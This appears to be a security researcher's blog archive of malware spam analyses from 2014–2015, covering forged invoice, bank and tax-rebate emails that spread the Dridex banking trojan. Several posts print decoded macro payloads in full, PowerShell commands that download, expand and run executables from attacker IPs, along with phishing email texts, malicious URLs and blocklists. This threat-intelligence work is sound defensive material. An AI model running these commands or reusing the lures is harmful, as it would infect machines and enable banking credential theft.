Sponsored by..

Showing posts with label France. Show all posts
Showing posts with label France. Show all posts

Monday 6 July 2015

Malware spam: "Statement as at 30/06/2015" / "Manchester Accounts [manchester.accounts@hobsrepro.com]" / "blogdynamoocom.exe"

This fake financial spam does not come from Hobs Reprographics plc but instead is a simple forgery with a malicious attachment. The malware also rather cheekily includes a reference to this blog. Привет, ребята!

From:    Manchester Accounts [manchester.accounts@hobsrepro.com]
Date:    6 July 2015 at 07:10
Subject:    Statement as at 30/06/2015

Please find attached statement from HOBS REPROGRAPHICS PLC as at
30/06/2015.

Please note that our payment terms are 30 days.

So far I have only seen one sample, with an attachment named ELLE013006.doc [VT 4/54] which contains this malicious macro [pastebin] which downloads a malicious executable from:

ozelduzensurucukursu.com/253/632.exe

Well, it would do, but in the sample I have there's a syntax error in the URL..

There are usually several versions of the document, probably some of the others work OK. The executable is saved as %TEMP%\blogdynamoocom.exe (see what they did there?) and has a VirusTotal detection rate of 1/50. Automated analysis tools [1] [2] [3] indicates that the malware phones home to:

62.210.214.106 (OVH, France)
93.89.224.97 (Isimtescil, Cyprus)
87.236.215.151 (OneGbits, Lithuania)


The payload to this is almost definitely the Dridex banking trojan.

Recommended blocklist:
62.210.214.106
93.89.224.97
87.236.215.151


MD5:
9daf4c0bca8fbba53517fdab1ef4e16d
1a468423fc391c90a6e4d6c0dbbc085f



Monday 29 June 2015

Malware spam: "CEF Documents" / "Dawn.Sandel@cef.co.uk" / "Dawn Sandel"

This fake financial spam does not come from City Electrical Factors but is instead a simple forgery with a malicious attachment.

From: "Dawn.Sandel@cef.co.uk" [Dawn.Sandel@cef.co.uk]
Subject: CEF Documents
Date: Mon, 29 Jun 2015 13:48:27 +0300


Please find attached the following documents issued by City Electrical Factors:

Invoice - BLA/176035 - DUCHMAID

If you have any problems or questions about these documents then please do not hesitate to contact us.

Regards,
Dawn Sandel
Phone: 01282 698 112
Fax: 01282 696 818


Dawn Sandel
Group Office
Nelson & Northwest Region

City Electrical Factors Limited
Tel: 01282 698 112  Fax: 01282 696 818
11 Kenyon Road, Lomeshaye Industrial Estate, Nelson, BB9 5SPv

The attachment is BLA176035.doc which contains a malicious macro. So far I have seen two different versions (Analysed here by Payload Security's Hybrid Analysis [1] [2]) which download a binary from one of the following locations:

dev.seasonsbounty.com/543/786.exe
cbebay.com/543/786.exe


This executable has a detection rate of 11/55. Those analyses show the samples phoning home to the following IPs:

78.47.139.58 (Hetzner, Germany)
87.236.215.151 (OneGbits, Lithuania)
91.121.173.193 (OVH, France)
183.81.166.5 (IP ServerOne, Malaysia)

The payload is probably Dridex, but I was not able to get a copy of the DLL.

Recommended blocklist:
78.47.139.58
87.236.215.151
91.121.173.193
183.81.166.5

MD5s:
65520ecd513c8b8b75f601aa2e69aeef
6bb2b8dc2129ad62ba459797c8544ff3
1396d0cb86bd400f7e364d583958ac33

Monday 15 June 2015

Malware spam: "Payment Confirmation 29172230" / "reed.co.uk Credit Control [mailto:creditcontrol.rol@reed.co.uk]"

This fake financial spam does not come from Reed, but is instead a simple forgery with a malicious attachment:

From: reed.co.uk Credit Control [mailto:creditcontrol.rol@reed.co.uk]
Sent: Monday, June 15, 2015 11:10 AM
Subject: Payment Confirmation 29172230

Dear Sirs,

Many thanks for your card payment. Please find payment confirmation attached below.

Should you have any queries, please do not hesitate to contact Credit Control Team on 0845 241 9293.

Kind Regards

Credit Control Team
T: 020 7067 4584
F: 020 7067 4628
Email: creditcontrol.rol@reed.co.uk
The only sample I have seen so far has an attachment 29172230_15.06.15.doc [detection rate 3/57] which contains this malicious macro [pastebin] which downloads a component from the following location:

http://www.freewebstuff.be/34/44.exe

This is saved as %TEMP%\ginkan86.exe and has a VirusTotal detection rate of 6/57. There will probably be other download locations, but they should all lead to an identical binary. Automated analysis tools [1] [2] [3] show traffoc to the following IPs:

136.243.14.142 (Hetzner, Germany)
71.14.1.139 (Charter Communications, US)
173.230.130.172 (Linode, US)
94.23.53.23 (OVH, France)
176.99.6.10 (Global Telecommunications Ltd, Russia)


According the this Malwr report, it also drops a Dridex DLL with a detection rate of 18/57.

Recommended blocklist:
136.243.14.142
71.14.1.139
173.230.130.172
94.23.53.23
176.99.6.10

MD5s:
4270bcfa447d96ccb41e486c74dd3d16
724683fa48c498a793d70161d46c811c
ff0f01d7da2ab9a6cf5df80db7cc508a

Wednesday 10 June 2015

Malware spam: "Hayley Sweeney [admins@bttcomms.com]" / "Your monthly BTT telephone bill"

This spam does not come from BTT Communications, but is instead a simple forgery with a malicious attachment:

From:    Hayley Sweeney [admins@bttcomms.com]
Date:    10 June 2015 at 11:20
Subject:    Your monthly BTT telephone bill

Please find attached your telephone bill for last month.
This message was sent automatically.

For any queries relating to this bill, please contact Customer Services on 01536 211100. 
So far I have only seen one sample with an attachment Invoice_68362.doc which contains this malicious macro [pastebin] which downloads a malicious executable from:

http://www.jimaimracing.co.uk/64/11.exe

This is saved as %TEMP%\birsafpc.exe and it has a VirusTotal detection rate of 6/57. Automated analysis tools show traffic to the following IPs:

173.230.130.172 (Linode, US)
94.23.53.23 (OVH, France)
176.99.6.10 (Global Telecommunications Ltd, Russia)


This Malwr report also indicates that it drops a Dridex DLL with a detection rate of 7/57.

Recommended blocklist:
173.230.130.172
94.23.53.23
176.99.6.10

MD5s:
80e51715a4242d0d25668d499796b733
10e4291882e2d45a1a7a52e7d93a5579
53f8addb0e1734be13735e51332b2e90

Wednesday 22 April 2015

Malware spam: "New document with ID:G27427P from RESTAURANT GROUP PLC was generated"

Made in Russia
I have only seen one sample of this spam so far, it is likely that other variants use different company names:

From:    Tamika Cortez
Date:    22 April 2015 at 14:33
Subject:    New document with ID:G27427P from RESTAURANT GROUP PLC was generated

New report with ID:G27427P was generated by our system. Please follow the link below to get your report.

Download report ID:G27427P

Best regards ,Tamika Cortez
RESTAURANT GROUP PLC

In this case, the link in the email goes to:

http://igruv.tourstogo.us/oalroshimt/fokreeshoo/thovoaksij?arg1=victim@victimdomain.com&arg2=G27427P.vbs&arg3=RESTAURANT%20GROUP%20PLC

..which includes the victim's email address in the URL. In turn, this redirects to:

http://igruv.tourstogo.us/oalroshimt/fokreeshoo/thovoaksij/files/G27427P.vbs  

As the name suggests, this is a VBScript (VT 1/56), in this case it is lightly obfuscated [pastebin] and it initiates a download from:

http://185.91.175.183/sas/evzxce.exe

..which is saved as %TEMP%\jhvwrvcf.exe. The download location is 176.31.28.226 (OVH, France). This file has a VirusTotal detection rate of 6/57. Automated analysis tools [1] [2] [3] show network connections to the following IPs:

144.76.73.3 (Hetzner, Germany)
5.44.216.44 (Camelhost SIA, Latvia)
62.210.214.249 (Iliad Entreprises / Poney Telecom, France)
89.184.66.18 (Invest Ltd, Ukraine)


According to this Malwr report, it drops a Dridex DLL with a detection rate of 3/57.

Recommended blocklist:
176.31.28.226
144.76.73.3
5.44.216.44
62.210.214.249
89.184.66.18


MD5s:
1fc2abec9c754e8cc1726bf40e0b3533
af8ff1ea180d5c45b4bb8c8f17c6cddc
57b54e248588af284871c2076f05651c



Thursday 19 March 2015

Malware spam: "Aspiring Solicitors Debt Collection" has mystery XML attachment

This spam has a malicious attachment.

Date:    19 March 2015 at 12:52
Subject:    Aspiring Solicitors Debt Collection

Aspiring Solicitors

Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance:       2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.

You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.

Court Fees  GBP 245.00

Solicitors Costs  GBP 750.00

Cheques or Postal Orders should be  made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.

Yours faithfully,
Shawn Ballard
Aspiring Solicitors

Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
Brighton
BN1 3XJ
United Kingdom
Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indication are that this can run even with macros disabled. Each attachment has a unique MD5.

Analysis is currently pending, this appears to have several new techniques to avoid detection. According to this Twitter conversation one version attempts to download a binary from 91.226.93.51/smoozy/shake.exe although this is currently timing out for me. For security analysts, a sample of the XML file can be found here.

IMPORTANT: if you have opened this document in Word then there is a good chance that you are infected. I would recommend that you shut down any machine that has opened this. Anti-virus detections are currently very poor, but vendors may have signature available soon, I would wait 24 hours before attempting to disinfect any infected machine. Dridex collects banking passwords, so it is important that machines are not used for financial transactions.

UPDATE:

This particular attack uses some novel features. Opening the Word document reveals what appears to be an embedded XLS file:

There's some interesting metadata.. created by "Dredex" of "Ph0enix Team", then modified by "ПРроываААА".


In the typical attack scenario, opening the embedded file will force the macro to run. In this case, I used LibreOffice on a Linux box which does not support VBA. This revealed the malicious code, which looks like this.

A bit of copy-and-pasting reveals nothing more sophisticated than some Base 64 encoded text that attempts to run one of the following commands:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.199/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.226.93.51/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.227.18.76/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
FYI, those IPs are allocated as follows:

193.26.217.199 (Servachok Ltd, Russia)
91.226.93.51 (Sobis OOO, Russia)
91.227.18.76 (Eximius LLC, Russia)
176.31.28.244 (OVH, France / Bitweb LLC, Russia)

"shake.exe" has a VirusTotal detection rate of 3/57. Between that VirusTotal report and this Malwr report we can see the malware attempting to connect to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
87.236.215.105 (OneGbits, Lithuania)
31.160.233.212 (KPN Zakelijk Internet, Netherlands)

Further analysis is pending.

Recommended blocklist:
193.26.217.199
91.226.93.51
91.227.18.76
176.31.28.244
95.163.121.0/24
87.236.215.105
31.160.233.212





Wednesday 18 March 2015

Malware spam: "December unpaid invoice notification"

This spam comes with no body text, but does come with a malicious attachment.

From:    Korey Mack
Date:    18 March 2015 at 11:04
Subject:    December unpaid invoice notification
So far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\huiUGI8t8dsF.cab'); expand %TEMP%\huiUGI8t8dsF.cab %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;
Although the EXE file from 176.31.28.244 (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.

This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs:

31.25.77.154 (Call U Communications, Palestine)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
188.165.5.194 (OVH, Ireland)
188.165.26.237 (OVH, Latvia)
115.241.60.56 (Reliance Communication, India)
46.19.143.151 (Private Layer INC, Switzerland)

Recommended blocklist:
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244



Malware spam: "Confirmation of Booking" / "NWN Media Ltd" / "Della Richardson"

This spam is not from NWN Media Ltd but is instead a simple forgery sent out to random email addresses with a malicious attachment. NWN Media are not responsible for this spam, nor have their systems been compromised.

From:    della.richards2124@nwn.co.uk [della.richards@nwn.co.uk]
Date:    18 March 2015 at 08:34
Subject:    Confirmation of Booking

This booking confirmation forms a binding contract between yourselves and NWN Media Ltd.
If you do not agree with any of the details above then please contact the named sales representative on the above number immediately.


Yours sincerely,

Della
NWN Media Ltd
Attached is a file NWN Confirmation Letter.doc which I have so far seen in two different versions, both with low detection rates [1] [2] which contain slightly different malicious macros [1] [2] which then go and download a malicious binary from one of the following locations:

http://pmmarkt.de/js/bin.exe
http://deosiibude.de/deosiibude.de/js/bin.exe

These are saved as %TEMP%\zakilom86.exe and %TEMP%\Pikadlo64.exe respectively. The binaries are actually identical and have a VirusTotal detection rate of 5/57. According to the Malwr report this binary attempts to communicate with the following IPs:

31.41.45.211 (Relink Ltd, Russaia)
109.234.159.250 (Selectel Ltd, Russia)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud / IT House, Russia)
95.163.121.200 (Digital Networks CSJC aka DINETHOSTING / Russia)

It then drops what appears to be another version of itself called edg1.exe onto the target system [VT 2/55] along with a malicious Dridex DLL [VT 3/55]

Recommended blocklist:
31.41.45.211
109.234.159.250
37.59.50.19
62.76.179.44
95.163.121.0/24



Wednesday 11 March 2015

Malware spam: "Voicemail Message (07813297716) From:07813297716"

When was the last time someone sent you a voice mail message by email? Never? There are no surprises to find that this spam email message has a malicious attachment.
From:     Voicemail admin@victimdomain
Date:     11/03/2015 11:48
Subject:     Voicemail Message (07813297716) From:07813297716

IP Office Voicemail redirected message

Attachment: MSG00311.WAV.ZIP
The attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57. According to the Malwr report, it pulls down another executable and some config files from:

http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php

This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicous macros rather than EXE-in-ZIP attacks.

The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:

http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe


This component has a detection rate of 5/57. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57 which is the same Dridex binary we've been seeing all day.

Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:

31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)

Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159




Malware spam: BACS "Remittance Advice" / HMRC "Your Tax rebate"

These two malware spam runs are aimed at UK victims, pretending to be either a tax rebate or a BACS payment.

From:    Long Fletcher
Date:    11 March 2015 at 09:44
Subject:    Remittance Advice

Good Morning,

Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.

Please note this may show on your account as a payment reference of FPALSDB.

Kind Regards
Long Fletcher
Finance Coordinator


Attachment: LSDB.xls

----------

From:    Vaughn Baker
Date:    11 March 2015 at 09:27
Subject:    Your Remittance Advice [FPABHKZCNZ]

Good Morning,

Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.

Please note this may show on your account as a payment reference of FPABHKZCNZ.

Kind Regards
Vaughn Baker
Senior Accountant

----------

From:    HMRC
Date:    11 March 2015 at 10:04
Subject:    Your Tax rebate

Dear [redacted],

After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.

To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).

Regards, HM Revenue Service. We apologize for the inconvenience.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved

Sample attachment names:

HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)

All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which when decrypted attempt to run the following Powershell commands:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
These are probably compromised hosts, for the record they are:

193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)

These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)

According to this Malwr report it drops two further malicious files with the following MD5s:

c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]

Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177



Wednesday 18 February 2015

Multiple spam emails using malicious XLS or XLSM attachment

I'm seeing multiple spam runs (probably pushing the Dridex banking trojan) with no body text, various subjects and either an XLS or XLSM attachment.

Example subjects include:
Copy [ID:15E376774] attaced
RE: Requests documentation [458C28133]
Request error [C3843]
Request error [FDF396530]
Requests documentation [242B035667]


Attachments look something similar to this:
15E376774.xlsm
242B035667.xlsm
458C28133.xls
C3843.xls
FDF396530.xlsm

The XLS and XLSM files are different structurally.. the XLSM files are basically an Office 2007 ZIP archive of all the data components, the XLS files are an old school Office 2003 file. Nevertheless, they contain a macro with 23 components to make it harder to analyse, although the important modules are Module 11 which contains the text string to decrypt, and Module 14 which contains the decryption function itself. Almost everything else is irrelevant.

Once the string is decrypted, it becomes fairly obvious what it going on. So far, there appear to be four strings with different download locations:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.151/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.235/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
So, we can see a file dxzq.jpg being downloaded which is actually a CAB file (JIOiodfhioIH.cab) which is then expanded to JIOiodfhioIH.exe and then run.

For information, these IPs are hosted by:

5.196.243.7 (OVH, Ireland)
46.30.42.151 (Eurobtye LLC, Russia)
176.31.28.235 (OVH, France)
92.63.88.63 (MWTV, Latvia)

This executable has a detection rate of 4/56. Automated analysis [1] [2] [3] shows attempted network connections to:

82.151.131.129 (Doruknet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)

The Malwr report shows that it also drops a DLL with a detection rate of just 1/56.

Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
5.196.243.7
46.30.42.151
176.31.28.235
92.63.88.63

For research purposes, a copy of the files analysed and dropped can be found here, password is infected

Thursday 16 October 2014

Barclays Bank "Transaction not complete" spam

This fake Barclays spam leads to malware.

From:     Barclays Bank [Barclays@email.barclays.co.uk]
Date:     16 October 2014 12:48
Subject:     Transaction not complete

Unable to complete your most recent Transaction.

Currently your transaction has a pending status. If the transaction was made by mistake please contact our customer service.


For more details please download payment receipt below:

http://essecisoftware.it/docs/viewdoc.php


Barclays is a trading name of Barclays Bank PLC and its subsidiaries. Barclays Bank PLC is authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority (Financial Services Register
No. 122702). Registered in England. Registered Number is 1026167 with registered
office at 1 Churchill Place, London E14 5HP.

Clicking on the link downloads a file document23_pdf.zip containing a malicious executable document23_pdf.scr which has a VirusTotal detection rate of  4/54. The Malwr report shows that it reaches out to the following URLs:

http://188.165.214.6:12302/1610uk1/HOME/0/51-SP3/0/
http://188.165.214.6:12302/1610uk1/HOME/1/0/0/
http://188.165.214.6:12302/1610uk1/HOME/41/5/1/
http://jwoffroad.co.uk/img/t/1610uk1.osa


In my opinion 188.165.214.6 (OVH, France) is an excellent candidate to block or monitor.

It also drops two executables, bxqyy.exe (VT 5/54, Malwr report) and ldplh.exe (VT 1/51, Malwr report)
.


Monday 8 September 2014

RBS "Important Docs" spam doing the rounds again

The Royal Bank of Scotland has been spoofed several times recently, this latest fake spam contains a payload that looks like it might be Cryptowall.

Date:      Mon, 8 Sep 2014 15:00:22 +0100 [10:00:22 EDT]
From:      Vicente Mcneill [Vicente@rbs.co.uk]
Subject:      Important Docs

Please review attached documents regarding your account.

Tel:  01322 929655
Fax: 01322 499190
email: Vicente@rbs.co.uk

This information is classified as Confidential unless otherwise stated. 
Attached is an archive RBS_Account_Documents.zip containing a malicious executable RBS_Account_Documents.scr which has a detection rate at VirusTotal of 4/53. The ThreatTrack analysis [pdf] shows that it attempts to download components from the following locations:

95.141.37.158/0809uk1/NODE01/0/51-SP3/0/
95.141.37.158/0809uk1/NODE01/1/0/0/
95.141.37.158/0809uk1/NODE01/41/5/4/
bullethood.com/ProfilePics/0809uk1.zip

95.141.37.158 is SeFlow.it Internet Services, Italy. bullethood.com is on a shared server at GoDaddy. The malware also appears to be attempting to connect to 94.23.250.88 (OVH, France).

Recommended blocklist:
bullethood.com
95.141.37.158
94.23.250.88

Thursday 31 July 2014

"Scanned Image from a Xerox WorkCentre" spam

This is a thoroughly old school spam with a malicious attachment.

Date:      Thu, 31 Jul 2014 18:16:08 +0000 [14:16:08 EDT]
From:      Local Scan [scan.614@victimdomain]
Subject:      Scanned Image from a Xerox WorkCentre

You have a received a new image from Xerox WorkCentre.

Sent by: victimdomain
Number of Images: 5
Attachment File Type: ZIP [PDF]

WorkCentre Pro Location: Machine location not set
Device Name: victimdomain

Attached file is scanned image in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: http://www.adobe.com/

Guess what.. it isn't an image at all, but a ZIP file with the unusual name of Image_[_var=partorderb].zip which contain a malicious executable Image_07312014.scr, scoring a measly 1/54 at VirusTotal.

The Comodo CAMAS report shows that the malware downloads components from the following locations:

94.23.247.202/3107us2/SANDBOXA/0/51-SP2/0/
94.23.247.202/3107us2/SANDBOXA/1/0/0/
94.23.247.202/3107h2/SANDBOXA/1/0/0/
94.23.247.202/3107op2/SANDBOXA/1/0/0/
globe-runners.com/fichier_pdf/31u2.zip
lucantaru.it/docs/31u2.zip
mediamaster-2000.de/img/heap.zip
ig-engenharia.com/wp-content/uploads/2014/02/heap.zip
upscalebeauty.com/img/colors/teal/opened.zip
lagrimas.tuars.com/css/opened.zip


There are some further clues in the VirusTotal comments as to what the malware does. Sophos has also seen the 94.23.247.202 (OVH, France) IP before.

Recommended blocklist:
94.23.247.202
globe-runners.com
lucantaru.it
mediamaster-2000.de
ig-engenharia.com
upscalebeauty.com
lagrimas.tuars.com

Friday 18 July 2014

Something evil on 5.135.211.52 and 195.154.69.123

This is some sort of malware using insecure OpenX ad servers to spread. Oh wait, insecure is pretty much the default configuration for OpenX servers..

..anyway, I don't know quite what it is, but it's running on a bunch of hijacked GoDaddy subdomains and is triggering a generic Javascript detection on my gateway. Domains spotted in this cluster are:

fart.somerspointnjinsurance.com
farms.somerspointnjinsurance.com
farming.somerspointnjinsurance.com
farma.risleyhouse.net
farmer.risleyhouse.net
farmers.risleyhouse.net
par.ecofloridian.info
papers.ecofloridian.com
papa.trustedelderlyhomecare.net
paper.trustedelderlyhomecare.org
pap.trustedelderlyhomecare.info
fas.theinboxexpert.com
fashion.theinboxexpert.com

The two IPs in use both belong to OVH France, but 5.135.211.52 is suballocated to QHoster Ltd (Bulgaria) [VT] and 195.154.69.123 is suballocated to Iliad Entreprises (France) [VT]. This second IP has also been used to host "one two three" malware sites back in May.

Recommended blocklist:
5.135.211.52
195.154.69.123
somerspointnjinsurance.com
risleyhouse.net
ecofloridian.info
ecofloridian.com
trustedelderlyhomecare.net
trustedelderlyhomecare.org
trustedelderlyhomecare.info
theinboxexpert.com

Tuesday 1 July 2014

Something evil on 37.187.140.57 (OVH, France)

A group of Cushion Redirect sites appear to be hosted on 37.187.140.57 (OVH, France), although I cannot determine the exact payload of these sites you can be assured that it is Nothing Good and you may well want to block the IP.

Here is a sample URLquery report for this IP. VirusTotal also reports a low number of detections for this address.

Domains being abused in this attack include:
charlie-lola.co.uk
clashofclanshackdownload.com
check-email.org
cialis25.pl

adultvideoz.net


(UPDATE: domain names crossed out above have been secured)

In all cases the attack is carried out by using a malicious subdomain. The following subdomains have been spotted by rDNS and are an illustration only:
u2t1x94kcgm78tfitogjmfn.charlie-lola.co.uk
j9h7uktct4cg8mri2a0t1mj.charlie-lola.co.uk
p4frt6l6fuvfd931x99ayff.charlie-lola.co.uk
tl6ilmdwddgda432tx8r6xp.adultvideoz.net
xdwnzxkviyy7recx6o3b7wp.adultvideoz.net
3ttlji59f7m31ajx26ctmnw.clashofclanshackdownload.com
mbpemlkg3e6oyb1nil0y6iw.clashofclanshackdownload.com
ipb0e6gyl3oncrkelry1lfp.adultvideoz.net
huqla44lvwmxh7xjhtaq0lj.charlie-lola.co.uk
xqskvg1xqaxbi6q13z9b4rp.adultvideoz.net
t9su831121c8r5or2feha7t.charlie-lola.co.uk
wyxu3oez5ft5rufht09mttt.charlie-lola.co.uk
3eo5hresu1a1516ufa681gj.charlie-lola.co.uk
1xb601q9k4ktfdvqi31mhrt.charlie-lola.co.uk
4qhbnyqhifpuxvoxaj8fhjp.check-email.org
gihhyaqq6ehfnxipbbj8fnp.adultvideoz.net
wyxu3oez5ft5rufht09mttt210553d228156921089e2ef107d2c1f61.charlie-lola.co.uk
7yl01vizcjnq2r8k1c2229p.clashofclanshackdownload.com
sfab6xb5ahiiuyrnv8hyrjt.charlie-lola.co.uk
c7hfahqlxxwj5uvvuulhyt7.clashofclanshackdownload.com
wvohhjwauiln9hvq7nhvkxi.clashofclanshackdownload.com
t9su831121c8r5or2feha7t221453d201d448c7589e2d68b4e1eeb3f.charlie-lola.co.uk
192rkauuv6uuodfp9vjk3ip.adultvideoz.net
u2t1x94kcgm78tfitogjmfn214653d1fd553376a863d8fa4c8357152.charlie-lola.co.uk
y9er5auuv159idfp94v93ip.adultvideoz.net
wrfttm9tz7j8286rt1icdim.charlie-lola.co.uk
fipdt61atjqlpqhv3ip5pjj.adultvideoz.net
